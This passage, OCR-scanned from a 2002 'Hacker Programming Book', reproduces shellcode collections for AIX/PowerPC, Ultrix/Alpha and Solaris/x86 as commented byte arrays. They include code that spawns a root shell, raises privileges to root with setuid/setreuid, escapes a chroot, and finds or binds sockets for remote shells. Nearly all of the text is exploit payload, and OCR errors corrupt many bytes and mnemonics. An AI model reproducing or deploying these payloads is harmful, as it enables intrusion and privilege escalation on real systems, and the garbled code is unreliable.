(setreuidcode) 


*/ 




"\x7e\xa8\x02\xa6" 


/* 


mflr 


r21 


*/ 




" \x3a \xb5 \x01 \x40 " 


/* 


cai 


r21, 0x140 (r21) 


*/ 




"\x88 \x55 \xfe \xeO" 


/* 


lbz 


r2, -288 (r21 ) 


*/ 




"\x7e\x83\xa3\x78" 


/* 


mr 


r3, r20 


*/ 




" \x3a \xd5 \xfe \xe4 " 


/* 


cai 


r22, -284 (r21 ) 


*/ 




"\x7e\xc8\x03\xa6" 


/* 


mtlr 


r22 


*/ 




"\x4c\xc6\x33\x42" 


/* 


crorc 


cr6, cr6, cr6 


*/ 




" \x44 \xff\xff\x02 " 


/* 


svca 




*/ 




iifdef V41 












"\x68 \x03 \xff\xff" 












iendif 












iifdef V42 












"\x71\x02\xff\xff" 












iendif 












iifdef V43 












" \x82 \x04 \xff\xff" 












iendif 












"\x38\x75 \xff\x04 " 


/* 


cai 
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"\x38\x95\xff\x0c" 


/* 


cai 


r4,-244 (r21) 


*/ 


"\x7e\x85\xa3\x78" 


/* 


nr 


r5, r20 


*/ 


" \x90 \x75 \xff\xOc " 


/* 


st 


r3,-244(r21) 


*/ 


" \x92 \x95 \xff\xl 0 " 


/* 


st 


r20,-240(r21) 


*/ 


"\x88\x55\xfe\xel " 


/* 


lbz 


r2,-287(r21) 


*/ 


" \x9a \x95 \xff\xOb " 


/* 


stb 


r20,-245 (r21) 


*/ 


" \x4b\xff\xff\xd8 " 


/* 


bl 


(setreuidcode+32) 


*/ 


"/bin/sh " 

r 










char syscallcode[]= 


/* 


14*4 bytes 


*/ 


"\x7e\x94\xa2\x79" 


/* 


xor. 


r20, r20, r20 


*/ 


" \x40\x82 \xff\xfd " 


/* 


bnel 


<syscallcode> 


*/ 


"\x7e\xa8\x02\xa6" 


/* 


mflr 


r21 


*/ 


" \x3a \xcO \x01 \xff" 


/* 


lil 


r22, Oxl ff 


*/ 


" \x3a \xf6\xfe \x2d " 


/* 


cai 


r23,-467 (r22) 


*/ 


"\x7e \xb5 \xba \xl4" 


/* 


cax 


r21,r21,r23 


*/ 


"\x7e\xa9\x03\xa6" 


/* 


mtctr 


r21 


*/ 


"\x4e\x80\x04\x20" 


/* 


bctr 




*/ 


iifdef V41 










"\x03\x68\x41\x5e" 










"\x6d\x7f\x6f\xd6" 










"\x57\x56\x55\x53" 










iendif 










iifdef V42 










"\x02\x71\x46\x62" 










"\x76\x8e\x78\xe7" 










"\x5b\x5a\x59\x58" 










iendif 










iifdef V43 










" \x04 \x82 \x53 \x71 " 










"\x87\xa0\x89\xfc" 










"\x69\x68\x67\x65" 










iendif 










" \x4c\xc6\x33 \x42 " 


/* 


crorc 


cr6, cr6, cr6 


*/ 


" \x44 \xff\xff\x02 " 


/* 


svca 


0x0 


*/ 


" \x3a \xb5 \xff\xf8 " 


/* 


cai 


r21,-8(r21) 


*/ 


char shellcode [] = 


/* 


12*4+7 bytes 


*/ 


"\x7c\xa5\x2a\x79" 


/* 


xor. 


r5, r5, r5 


*/ 


" \x40\x82 \xff\xfd " 


/* 


bnel 


<shellcode> 


*/ 


"\x7f\xe8\x02\xa6" 


/* 


mflr 


r31 


*/ 


"\x3b\xff\x01\x20" 


/* 


cai 


r31, 0x120 (r31) 


*/ 


"\x38 \x7f\xff\x08 " 


/* 


cai 


r3, -248 (r31) 


*/ 


"\x38 \x9f\xff\xl 0 " 


/* 


cai 


r4,-240(r31) 


*/ 


" \x90 \x7f\xff\xl 0 " 


/* 


st 


r3,-240(r31) 


*/ 


" \x90 \xbf\xff\xl 4 " 


/* 


st 


r5,-236(r31) 


*/ 


"\x88 \x55 \xff\xf4 " 


/* 


lbz 


r2,-12(r21) 


*/ 


" \x98 \xbf\xff\xOf" 


/* 


stb 


r5, -241 (r31 ) 


*/ 


"\x7e\xa9\x03\xa6" 


/* 


mtctr 


r21 


*/ 


"\x4e\x80\x04\x20" 


/* 


bctr 




*/ 


"/bin/sh " 

; 










char cmdshellcode [ ] = 


/* 


17*4+12+cmdlen bytes 


*/ 


"\x7c\xa5\x2a\x79" 


/* 


xor. 


r5, r5, r5 


*/ 


" \x40\x82 \xff\xfd " 


/* 


bnel 


<cmdshellcode> 


*/ 


"\x7f\xe8\x02\xa6" 


/* 


mflr 


r31 


*/ 


" \x3b\xff\x01 \x2c " 


/* 


cai 


r31, 0xl2c (r31) 


*/ 


"\x38 \x7f\xff\xl 0 " 


/* 


cai 


r3,-240 (r31) 


*/ 


"\x38 \x9f\xfe \xc8 " 


/* 


cai 


r4,-312 (r31) 


*/ 


"\x38 \xdf\xff\xl 8 " 


/* 


cai 


r6, -232 (r31 ) 


*/ 


"\x38 \xff\xff\xlc" 


/* 


cai 


r7, -228 (r31 ) 


*/ 


" \x90 \x7f\xfe \xc8 " 


/* 


st 


r3,-312 (r31) 


*/ 


" \x90 \xdf\xfe \xcc " 


/* 


st 


r6,-308(r31) 


*/ 


" \x90 \xff\xfe \xdO " 


/* 


st 


r7,-304 (r31) 


*/ 


" \x90 \xbf\xfe \xd4 " 


/* 


st 


r5,-300(r31) 


*/ 


" \x98 \xbf\xff\xl 7 " 


/* 


stb 


r5,-233(r31) 


*/ 


" \x98 \xbf\xff\xla " 


/* 


stb 


r5,-230(r31) 


*/ 


"\x88 \x55 \xff\xf4 " 


/* 


lbz 


r2,-12(r21) 


*/ 


"\x7e\xa9\x03\xa6" 


/* 


mtctr 


r21 


*/ 


"\x4e\x80\x04\x20" 


/* 


bctr 




*/ 


"/bin/sh -c " 










/* command */ 











Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



setreuidcode [ ] = 


/* 


4*4 bytes 


*/ 


\x88 \x55 \xff\xf5 " 


/* 


lbz 


r2,-ll (r21) 


*/ 


\x7e\x83\xa3\x78" 


/* 


mr 


r3, r20 


*/ 


\x7e\xa9\x03\xa6" 


/* 


mtctr 


r21 


*/ 


\x4e\x80\x04\x21 " 


/* 


bctrl 




*/ 


chrootcode [ ] = 


/* 


23*4 bytes 


*/ 


\x2c\x74\x2e\x2e " 


/* 


empi 


crO, r20, 0x2e2e 


*/ 


\x41\x82\xff\xfd" 


/* 


beql 


<chrootcode> 


*/ 


\x7f\x08\x02\xa6" 


/* 


mflr 


r24 


*/ 


\x92 \x98 \xff\xfc " 


/* 


st 


r20,-4 (r24) 


*/ 


\x38\x78\xff\xf9" 


/* 


cai 


r3,-7(r24) 


*/ 


\x88 \x55 \xff\xf9 " 


/* 


lbz 


r2,-7(r21) 


*/ 


\x7e\xa9\x03\xa6" 


/* 


mtctr 


r21 


*/ 


\x4e\x80\x04\x21 " 


/* 


bctrl 




*/ 


\x38\x78\xff\xf9" 


/* 


cai 


r3,-7(r24) 


*/ 


\x88\x55\xff\xfa" 


/* 


lbz 


r2,-6(r21) 


*/ 


\x7e\xa9\x03\xa6" 


/* 


mtctr 


r21 


*/ 


\x4e\x80\x04\x21 " 


/* 


bctrl 




*/ 


\x3b\x20\x01\x01 " 


/* 


lil 


r25, 0x101 


*/ 


\x38\x78 \xff\xfa " 


/* 


cai 


r3, -6 (r24) 


*/ 


\x88\x55\xff\xf8" 


/* 


lbz 


r2,-8 (r21) 


*/ 


\x7e\xa9\x03\xa6" 


/* 


mtctr 


r21 


*/ 


\x4e\x80\x04\x21 " 


/* 


bctrl 




*/ 


\x37\x39\xff\xff" 


/* 


ai . 


r25, r25, -1 


*/ 


\x40\x82\xff\xec" 


/* 


bne 


<chrootcode+52> 


*/ 


\x38\x78 \xff\xfb " 


/* 


cai 


r3,-5(r24) 


*/ 


\x88 \x55 \xff\xfa " 


/* 


lbz 


r2,-6(r21) 


*/ 


\x7e\xa9\x03\xa6" 


/* 


mtctr 


r21 


*/ 


\x4e\x80\x04\x21 " 


/* 


bctrl 




*/ 



findsckcode [] = 


/* 


38*4 bytes 


*/ 


"\x2c\x74\xl2\x34" 


/* 


empi 


crO, r20, 0x1234 


*/ 


"\x41 \x82 \xff\xfd " 


/* 


beql 


<findsckcode> 


*/ 


"\x7f\x08\x02\xa6" 


/* 


mflr 


r24 


*/ 


"\x3b\x36\xfe\x2d" 


/* 


cai 


r25,-467 (r22) 


*/ 


"\x3b\x40\x01\x01 " 


/* 


lil 


r26, 0x16 


*/ 


"\x7f\x78\xca\xl4" 


/* 


cax 


r27,r24,r25 


*/ 


"\x7f\x69\x03\xa6" 


/* 


mtctr 


r27 


*/ 


"\x4e\x80\x04\x20" 


/* 


betr 




*/ 


"\xa3\x78\xff\xfe" 


/* 


lhz 


r27,-2(r24) 


*/ 


"\xa3\x98\xff\xfa" 


/* 


lhz 


r28,-6(r24) 


*/ 


"\x7c\xlb\xe0\x40" 


/* 


empi 


crO, r27, r28 


*/ 


"\x3b\x36\xfe\x59" 


/* 


cai 


r25,-423 (r22) 


*/ 


"\x41 \x82 \xff\xe4 " 


/* 


beq 


<findsckcode+20> 


*/ 


"\x7f\x43\xd3\x78" 


/* 


mr 


r3, r26 


*/ 


"\x38 \x98 \xff\xfc " 


/* 


cai 


r4,-4 (r24) 


*/ 


"\x38 \xb8 \xff\xf4 " 


/* 


cai 


r5, -12 (r24) 


*/ 


" \x93 \x38 \xff\xf4 " 


/* 


st 


r25,-12 (r24) 


*/ 


"\x88 \x55 \xff\xf6 " 


/* 


lbz 


r2,-10(r21) 


*/ 


"\x7e\xa9\x03\xa6" 


/* 


mtctr 


r21 


*/ 


"\x4e\x80\x04\x21 " 


/* 


bctrl 




*/ 


"\x37\x5a\xff\xff" 


/* 


ai . 


r 2 6, r 26,-1 


*/ 


"\x2d\x03\xff\xff" 


/* 


empi 


cr2, r3, -1 


*/ 


" \x40\x8a \xff\xc8 " 


/* 


bne 


cr2, <findsckcode+32> 


*/ 


" \x40\x82 \xff\xd8 " 


/* 


bne 


<findsckcode+48> 


*/ 


"\x3b\x36\xfe\x03" 


/* 


cai 


r25,-509(r22) 


*/ 


"\x3b\x76\xfe\x02 " 


/* 


cai 


r27,-510(r22) 


*/ 


"\x7f\x23\xcb\x78" 


/* 


mr 


r3, r25 


*/ 


"\x88 \x55 \xff\xf7 " 


/* 


lbz 


r2, -9 (r21 ) 


*/ 


"\x7e\xa9\x03\xa6" 


/* 


mtctr 


r21 


*/ 


"\x4e\x80\x04\x21 " 


/* 


bctrl 




*/ 


"\x7c\x7a \xda \xl4" 


/* 


cax 


r3,r26,r27 


*/ 


"\x7e\x84\xa3\x78" 


/* 


mr 


r4, r20 


*/ 


"\x7f\x25\xcb\x78" 


/* 


mr 


r5, r25 


*/ 


"\x88 \x55 \xff\xfb " 


/* 


lbz 


r2, -5 (r21 ) 


*/ 


"\x7e\xa9\x03\xa6" 


/* 


mtctr 


r21 


*/ 


"\x4e\x80\x04\x21 " 


/* 


bctrl 




*/ 


"\x37\x39\xff\xff" 


/* 


ai . 


r25, r25, -1 


*/ 


"\x40\x80 \xff\xd4 " 


/* 


bge 


<findsckcode+100> 


*/ 
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"\x7f\x08\x02\xa6" 


/* 


mflr 


r24 




*/ 


" \x92 \x98 \xff\xfc " 


/* 


st 


r20 


, -4 (r24) 


*/ 


"\x38\x76\xfe\x03" 


/* 


cai 


r3, 


-509 (r22) 


*/ 


"\x38\x96\xfe\x02 " 


/* 


cai 


r4, 


-510 (r 22) 


*/ 


" \x98 \x78 \xff\xf9 " 


/* 


stb 


r3, 


-7(r24) 


*/ 


"\x7e\x85\xa3\x78" 


/* 


mr 


r5, 


r20 


*/ 


"\x88 \x55 \xff\xfc " 


/* 


lbz 


r2, 


-4 (r21) 


*/ 


"\x7e\xa9\x03\xa6" 


/* 


mtctr 


r21 




*/ 


"\x4e\x80\x04\x21 " 


/* 


bctrl 






*/ 


"\x7c\x79\xlb\x78" 


/* 


mr 


r25 


,r3 


*/ 


"\x38 \x98 \xff\xf8 " 


/* 


cai 


r4, 


-8 (r24) 


*/ 


"\x38\xb6\xfe\xll" 


/* 


cai 


r5, 


-495 (r22) 


*/ 


"\x88 \x55 \xff\xfd " 


/* 


lbz 


r2, 


-3 (r21) 


*/ 


"\x7e\xa9\x03\xa6" 


/* 


mtctr 


r21 




*/ 


"\x4e\x80\x04\x21 " 


/* 


bctrl 






*/ 


" \x7f\x23 \xcb\x78 " 


/* 


mr 


r3, 


r25 


*/ 


"\x38\x96\xfe\x06" 


/* 


cai 


r4, 


-506 (r22) 


*/ 


"\x88\x55\xff\xfe" 


/* 


lbz 


r2, 


-2<r21) 


*/ 


"\x7e\xa9\x03\xa6" 


/* 


mtctr 


r21 




*/ 


"\x4e\x80\x04\x21 " 


/* 


bctrl 






*/ 


" \x7f\x23 \xcb\x78 " 


/* 


mr 


r3, 


r25 


*/ 


"\x7e\x84\xa3\x78" 


/* 


mr 


r4, 


r20 


*/ 


"\x7e\x85\xa3\x78" 


/* 


mr 


r5, 


r20 


*/ 


"\x88 \x55 \xff\xff" 


/* 


lbz 


r2, 


-1 (r21) 


*/ 


"\x7e\xa9\x03\xa6" 


/* 


mtctr 


r21 




*/ 


"\x4e\x80\x04\x21 " 


/* 


bctrl 






*/ 


"\x7c\x79\xlb\x78" 


/* 


mr 


r25 


,r3 


*/ 


"\x3b\x56\xfe\x03" 


/* 


cai 


r26 


, -509 (r22) 


*/ 


"\x7f\x43 \xd3 \x78" 


/* 


mr 


r3, 


r26 


*/ 


"\x88 \x55 \xff\xf7 " 


/* 


lbz 


r2, 


-9(r21) 


*/ 


"\x7e\xa9\x03\xa6" 


/* 


mtctr 


r21 




*/ 


"\x4e\x80\x04\x21 " 


/* 


bctrl 






*/ 


"\x7f\x23\xcb\x78" 


/* 


mr 


r3, 


r25 


*/ 


"\x7e\x84\xa3\x78" 


/* 


mr 


r4, 


r20 


*/ 


"\x7f\x45 \xd3 \x78" 


/* 


mr 


r5, 


r26 


*/ 


"\x88 \x55 \xff\xfb " 


/* 


lbz 


r2, 


-5(r21) 


*/ 


"\x7e\xa9\x03\xa6" 


/* 


mtctr 


r21 




*/ 


"\x4e\x80\x04\x21 " 


/* 


bctrl 






*/ 


"\x37\x5a\xff\xff" 


/* 


al . 


r26 


, r26, -1 


*/ 


"\x40\x80 \xff\xd4 " 


/* 


bge 


<bindsckcode+120> 


*/ 



idefine FINDSCKPORTOFS 2 
idefine BINDSCKPORTOFS 2 

iendif 

Ultrix/ALPHA codes, file: alpha-ultrix 

/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland * ://lsd-pl . net/ §*/ 

/*## asmcodes for ultrix 5.0 alpha #*/ 

/* 

syscall %v0 %a0, %al, %a2, %a3 



execv xOOb ->path=" /bin/sh" ,-> [->aO=path, 0] 

execv xOOb ->path=" /bin/sh" , -> [->aO=path, ->al="-c", ->a2=cmd, 0] 

setreuid x07e ruid, euid=0 

*/ 

#if de fined (ALPHA) && de fined (ULTRIX) 



shellcode [ ] = 


/* 


18*4+7 bytes 


*/ 


\xfb\x6b\x7f\x26" 


/* 


ldah 


a3, 27643 (zero) 


*/ 


\x01\x80\x73\x22 " 


/* 


Ida 


a3, -32767 (a3) 


*/ 


\x40\x01\x7e\xb2" 


/* 


stl 


a3, 320 (sp) 


*/ 


\x40\x01\x9e\x22 " 


/* 


Ida 


a4, 320 (sp) 


*/ 


\xl0\x40\x54\x6b" 


/* 


jsr 


ra, (a4) , 0x10 


*/ 


\x80\x82\x5a\x23" 


/* 


Ida 


ra, -32128 (ra) 


*/ 


\xl2\x04\xff\x47" 


/* 


bis 


zero, zero, a2 


*/ 


\xbb\x7d\xfa\x3b" 


/* 


stb 


zero, 32187 (r a) 


*/ 


\xb4\x7d\xla\x22 " 


/* 


Ida 


aO, 32180 (ra) 


*/ 


\xc4 \x7d\xla \xb6" 


/* 


stq 


aO, 32196 (ra) 


*/ 


\xc4\x7d\x3a\x22 " 


/* 


Ida 


al, 32196 (ra) 


*/ 


\xcc\x7d\xfa\xb7" 


/* 


sta 


zero. 32204 (ra) 


*/ 
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"\x80\x20\x7e \xb2 " 


/* 


stl 


a3, 8320 (sp) 


*/ 


"\x80\x20 \x9e \x22 " 


/* 


Ida 


a4, 8320 (sp) 


*/ 


" \xbb\x02 \xbf\x22 " 


/* 


Ida 


a5, 699 (zero) 


*/ 


"\x50\xfd\xl5\x20" 


/* 


Ida 


vO, -640 (a5) 


*/ 


"\xl0\x40\x54\x6b" 


/* 


jsr 


ra, (a4) , 0x10 


*/ 


"/bin/sh " 










char cmdshellcode[] = 


/* 


22*4+7 bytes 


*/ 


"\xfb\x6b\x7f\x26" 


/* 


ldah 


a3, 2 7643 (zero) 


*/ 


"\x01\x80\x73\x22 " 


/* 


Ida 


a3, -32767 (a3) 


*/ 


"\x40\x01\x7e\xb2" 


/* 


stl 


a3, 320 (sp) 


*/ 


" \x40\x01 \x9e \x22 " 


/* 


Ida 


a4, 320 (sp) 


*/ 


"\xl0\x40\x54\x6b" 


/* 


jsr 


ra, (a4) , 0x10 


*/ 


"\x80\x82\x5a\x23" 


/* 


Ida 


ra, -32128 (ra) 


*/ 


"\xcb\x7d\xfa\x3b" 


/* 


stb 


zero, 32203 (ra) 


*/ 


"\xce\x7d\xfa\x3b" 


/* 


stb 


zero, 32206 (ra) 


*/ 


" \xc4 \x7d\xla \x22 " 


/* 


Ida 


aO, 32196 (ra) 


*/ 


"\x5c\x7d\xla\xb6" 


/* 


stq 


aO, 32092 (ra) 


*/ 


" \xcc\x7d\x7a \x22 " 


/* 


Ida 


a3, 32204 (ra) 


*/ 


" \x64 \x7d\x7a \xb6" 


/* 


stq 


a3, 32100 (ra) 


*/ 


"\xd0\x7d\x7a\x22 " 


/* 


Ida 


a3, 32208 (ra) 


*/ 


"\x6c\x7d\x7a\xb6" 


/* 


stq 


a3, 32108 (ra) 


*/ 


"\x74\x7d\xfa\xb7" 


/* 


stq 


zero, 32116 (ra) 


*/ 


" \x5c\x7d\x3a \x22 " 


/* 


Ida 


al, 32092 (ra) 


*/ 


"\xl3\x74\xf0\x47" 


/* 


bis 


zero, 0x83, a3 


*/ 


"\x80\x20\x7e \xb2 " 


/* 


stl 


a3, 8320 (sp) 


*/ 


"\x80\x20 \x9e \x22 " 


/* 


Ida 


a4, 8320 (sp) 


*/ 


" \xbb\x02 \xbf\x22 " 


/* 


Ida 


a5, 699 (zero) 


*/ 


"\x50\xfd\xl5\x20" 


/* 


Ida 


vO, -688 (a5) 


*/ 


"\xl0\x40\x54\x6b" 


/* 


jsr 


ra, (a4) , 0x10 


*/ 


"/bin/sh -c " 

r 










char setreuidcode[]= 


/* 


11*4 


bytes 


*/ 


"\xff\xff\xlf\x22 " 


/* 


Ida 


aO, -1 (zero) 


*/ 


"\xll\x04\xff\x47" 


/* 


bis 


zero, zero, al 


*/ 


" \xbb\x02 \xbf\x22 " 


/* 


Ida 


a5, 699 (zero) 


*/ 


"\xc3\xfd\xl5\x20" 


/* 


Ida 


v0,-573 (a5) 


*/ 


"\xl3\x74\xf0\x47" 


/* 


bis 


zero, 0x83, a3 


*/ 


"\x80 \x02 \x7e \xb2 " 


/* 


stl 


a3, 640 (sp) 


*/ 


"\x80 \x02 \x9e \x22 " 


/* 


Ida 


a4, 640 (sp) 


*/ 


"\xfb\x6b\x7f\x26" 


/* 


ldah 


a3, 2 7643 (zero) 


*/ 


" \x01 \x80\x73 \x22 " 


/* 


Ida 


a3, -32767 (a3) 


*/ 


"\x84 \x02 \x7e \xb2 " 


/* 


stl 


a3, 644 (sp) 


*/ 


n \xl0\x40\x54\x6b" 

r 


/* 


jsr 


ra, (a4) , 0x10 


*/ 


char jump[] = 










"\00\x40\xde\x47" 


/* 


bis 


sp, sp, vO 


*/ 


"\01\x80\xfa\x6b" 


/* 


ret 


zero, (ra) , 1 


*/ 



iendif 



Solaris/x86 codes, file: x86-solaris 



/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland 
/*## asmcodes for solaris 2.6 2.7 2.8 x86 



:// lsd-pl.net/ §*/ 
#*/ 



/* 

syscall 

exec 

exec 

setuid 

mkdir 

chroot 

chdir 

ioctl 

so__socket 

bind 



%eax stack 

xOOb ret 
xOOb ret 
x017 ret, uid=0 
x050 ret,->path 
x03d ret 
xOOc ret 



>path=" /bin/ksh ", -> [->aO=path, 0] 
>path=" /bin/ksh ", -> [->aO=path, ->al=' : 



',mode= (each value is valid) 



->a2=cmd, 0 ] 



b. . ' 

>path=("b. . ", ". "} 
>path=" . . " 

x036 ret, sfd, TI_GETPEERNAME=0x5491 ,-> [mlen=0x91, len=0x91 , ->sadr= [ ] ] 
x0e6 ret,AF_INET=2, SOCK_STREAM=2,prot=0, devpath=0, S0V_DEFAULT=1 
x0e8 ret, sfd, ->sadr= [Oxff, 2, hi, lo, 0, 0, 0, 0] , len=0xl0, S0V__S0CKSTREAM=2 
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listen x0e9 ret, sfd, backlog=5, vers= (not required in this syscall) 

accept xOea ret, sfd, 0, 0,vers= (not required in this syscall) 

fcntl x03e ret, sfd, F_DUP2FD=Ox09, fd={0, 1,2} 
*/ 



iif defined(X86) && defined (SOLARIS) 



_shellcode [ ] = 


/* 


33+8 bytes 


*/ 


"\xeb\xla" 


/* 


jmp 


<shellcode+28> 


*/ 


"\x33\xd2" 


/* 


xorl 


%edx, %edx 


*/ 


"\x58" 


/* 


popi 


%eax 


*/ 


"\x8d\x78\xl4" 


/* 


leal 


0x14 (%eax) , %edi 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


"\x92" 


/* 


xchgl 


%eax, %edx 


*/ 


"\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


"\x88\x42\x08" 


/* 


movb 


%al, 0x8 (%edx) 


*/ 


"\x83\xef\x3b" 


/* 


subì 


$0x3b, %edi 


*/ 


"\xb0\x9a" 


/* 


movb 


$0x9a, %al 


*/ 


"\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


"\x47" 


/* 


incl 


%edi 


*/ 


"\xb0\x07" 


/* 


movb 


$0x07, %al 


*/ 


"\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


"\xbO\xOb" 


/* 


movb 


$OxOb, %al 


*/ 


"\xe8\xel \xff\xff\xff" 


/* 


cali 


<shellcode+2> 


*/ 



"/bin/ksh " 



char syscallcode[]= /* 

"\x33\xc0" /* 

"\xeb\x09" /* 

"\x5f" /* 

"\x57" /* 

"\x47" /* 

"\xab" /* 

"\x47" /* 

"\xaa" /* 

"\x5e" /* 

"\xeb\xOd" /* 
"\xe8\xf2\xff\xff\xff" /* 
"\x9a\xff\xff\xff\xff" 
"\x07\xff" 

"\xc3" /* 



26 bytes 


*/ 


xorl 


%eax, %eax 


*/ 


jmp 


<syscallcode+13> 


*/ 


popi 


iedi 


*/ 


pushl 


%edi 


*/ 


incl 


iedi 


*/ 


stosl 


%eax, %es: (iedi) 


*/ 


incl 


iedi 


*/ 


stosb 


ial, ies: (iedi) 


*/ 


popi 


iesi 


*/ 


jmp 


<syscallcode+2 6> 


*/ 


cali 


<syscallcode+4> 


*/ 


ret 




*/ 



shellcode [ ] = 


/* 


25+8 bytes 


*/ 


"\xeb\xl2" 


/* 


jmp 


<shellcode+20> 


*/ 


"\x33\xd2" 


/* 


xorl 


iedx, iedx 


*/ 


"\x58" 


/* 


popi 


ieax 


*/ 


"\x8d\x78\xl4" 


/* 


leal 


0x14 (ieax) , edi 


*/ 


"\x57" 


/* 


pushl 


iedi 


*/ 


"\x50" 


/* 


pushl 


ieax 


*/ 


"\xab" 


/* 


stosl 


ieax, ies: (iedi) 


*/ 


"\x92" 


/* 


xchgl 


ieax, iedx 


*/ 


"\xab" 


/* 


stosl 


ieax, ies: (iedi) 


*/ 


"\x88\x42\x08" 


/* 


movb 


ial, 0x8 (iedx) 


*/ 


"\xbO\xOb" 


/* 


movb 


$OxOb, ial 


*/ 


"\xff\xd6" 


/* 


cali 


*iesi 


*/ 


"\xe8 \xe9\xff\xff\xff" 


/* 


cali 


<shellcode+2> 


*/ 



"/bin/ksh " 



char 



cmdsh eli code [] = 


/* 


36+12+cmdlen bytes 


*/ 


\xeb\xld" 


/* 


jmp 


<cmdshellcode+31> 


*/ 


\x33\xd2" 


/* 


xorl 


iedx, iedx 


*/ 


\x58" 


/* 


popi 


ieax 


*/ 


\x8d\x78\xac" 


/* 


leal 


-0x44 (ieax) , edi 


*/ 


\x57" 


/* 


pushl 


iedi 


*/ 


\x50" 


/* 


pushl 


ieax 


*/ 


\x88\x50\x08" 


/* 


movb 


idi, 0x8 (ieax) 


*/ 


\x88\x50\x0b" 


/* 


movb 


idi, Oxb(ieax) 


*/ 


\xab" 


/* 


stosl 


ieax, ies : ( iedi ) 


*/ 


\x8d\x40\x09" 


/* 


leal 


0x09 (ieax) , ieax 


*/ 


\xab" 


/* 


stosl 


ieax, ies: (iedi) 


*/ 


\x8d\x40\x03" 


/* 


leal 


0x03 (ieax) , ieax 
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"\x92" 


/* 


xchgl 


%eax, %edx 


*/ 


"\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


"\xbO\xOb" 


/* 


movb 


$OxOb, %al 


*/ 


"\xff\xd6" 


/* 


cali 


*%esi 


*/ 


"\xe8 \xde \xff\xff\xff" 


/* 


cali 


<cmdshellcode+2> 


*/ 


"/bin/ksh -c " 










/* command */ 

f 










char setuidcode [ ] = 


/* 


7 bytes 




*/ 


n \x33\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\xb0\xl7" 


/* 


movb 


$0x1 7, %al 


*/ 


"\xff\xd6" 

r 


/* 


cali 


*%esi 


*/ 


char chrootcode [ ] = 


/* 


40 bytes 


*/ 


"\x68""b. . . " 


/* 


pushl 


$0x2e2e2e62 


*/ 


"\x89\xe7" 


/* 


movi 


%esp, %edi 


*/ 


"\x33\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\x88\x47\x03" 


/* 


movb 


%al, 0x3(%edi) 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


"\xb0\x50" 


/* 


movb 


$0x50, %al 


*/ 


"\xff\xd6" 


/* 


cali 


*%esi 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


"\xb0\x3d" 


/* 


movb 


$0x3d, %al 


*/ 


n \xff\xd6" 


/* 


cali 


*%esi 


*/ 


"\x47" 


/* 


incl 


%edi 


*/ 


"\x33\xc9" 


/* 


xorl 


%ecx, %ecx 


*/ 


"\xbl\xff" 


/* 


movb 


$Oxff, %cl 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


"\xbO\xOc" 


/* 


movb 


$OxOc, %al 


*/ 


"\xff\xd6" 


/* 


cali 


*%esi 


*/ 


"\xe2\xfa" 


/* 


loop 


<chroot code+28> 


*/ 


"\x47" 


/* 


incl 


%edi 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


"\xb0\x3d" 


/* 


movb 


$0x3d, %al 


*/ 


"\xff\xd6" 

r 


/* 


cali 


*%esi 


*/ 


char findsckcode[] = 


/* 


67 bytes 


*/ 


"\x56" 


/* 


pushl 


%esi 


*/ 


"\x5f" 


/* 


popi 


%edi 


*/ 


"\x83\xef\x7c" 


/* 


subì 


$0x7c, %edi 


*/ 


"\x57" 


/* 


pushl 


%edi 


*/ 


"\x8d\x4f\xl0" 


/* 


leal 


0x10 (%edi) , %ecx 


*/ 


"\xb0\x91 " 


/* 


movb 


$0x91, %al 


*/ 


"\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


"\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


"\x91 " 


/* 


xchgl 


%ecx, %eax 


*/ 


"\xab" 


/* 


stosl 


%eax, %es: (%edi) 


*/ 


"\x95 " 


/* 


xchgl 


%eax, %ebp 


*/ 


"\xb5\x54" 


/* 


movb 


$0x54, %ch 


*/ 


"\x51 " 


/* 


pushl 


%ecx 


*/ 


"\x66\xb9\x01\x01 " 


/* 


movw 


$0x0101, %cx 


*/ 


"\x51 " 


/* 


pushl 


%ecx 


*/ 


"\x33\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\xb0\x36" 


/* 


movb 


$0x36, %al 


*/ 


"\xff\xd6" 


/* 


cali 


*%esi 


*/ 


"\x59" 


/* 


popi 


%ecx 


*/ 


"\x33\xdb" 


/* 


xorl 


%ebx, %ebx 


*/ 


"\x3b\xc3 " 


/* 


empi 


%ebx, %eax 


*/ 


"\x75\x0a " 


/* 


jne 


<findsckcode+4 7> 


*/ 


" \x66\xbb\xl2 \x34" 


/* 


movw 


$0x1234, %bx 


*/ 


"\x66\x39\x5d\x02 " 


/* 


empw 


%bx, 0x2 (%ebp) 


*/ 


"\x74\x02 " 


/* 




<findsckcode+49> 


*/ 


"\xe2\xe6" 


/* 


loop 


<findsckcode+23> 


*/ 


"\x6a\x09" 


/* 


pushb 


$0x09 


*/ 


"\x51 " 


/* 


pushl 


%ecx 


*/ 


"\x91 " 


/* 


xchgl 


%ecx, %eax 


*/ 


"\xbl\x03" 


/* 


movb 


$0x03, %cl 


*/ 


"\x49" 


/* 


deci 


%ecx 


*/ 


"\x89\x4c\x24\x08" 


/* 


movi 


%ecx, 0x8 (%esp) 


*/ 


"\x41" 


/* 


incl 


%ecx 


*/ 


"\xb0\x3e" 


/* 


movb 


$0x3e, %al 


*/ 
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char bindsckcode[] = 


/* 


73 bytes 


*/ 


n \x33\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\x68 \xff\x02 \xl2\x34" 


/* 


pushl 


$0x341202ff 


*/ 


"\x89\xe7" 


/* 


movi 


$esp, %edi 


*/ 


"\x40" 


/* 


incl 


%eax 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\x48" 


/* 


deci 


%eax 


*/ 


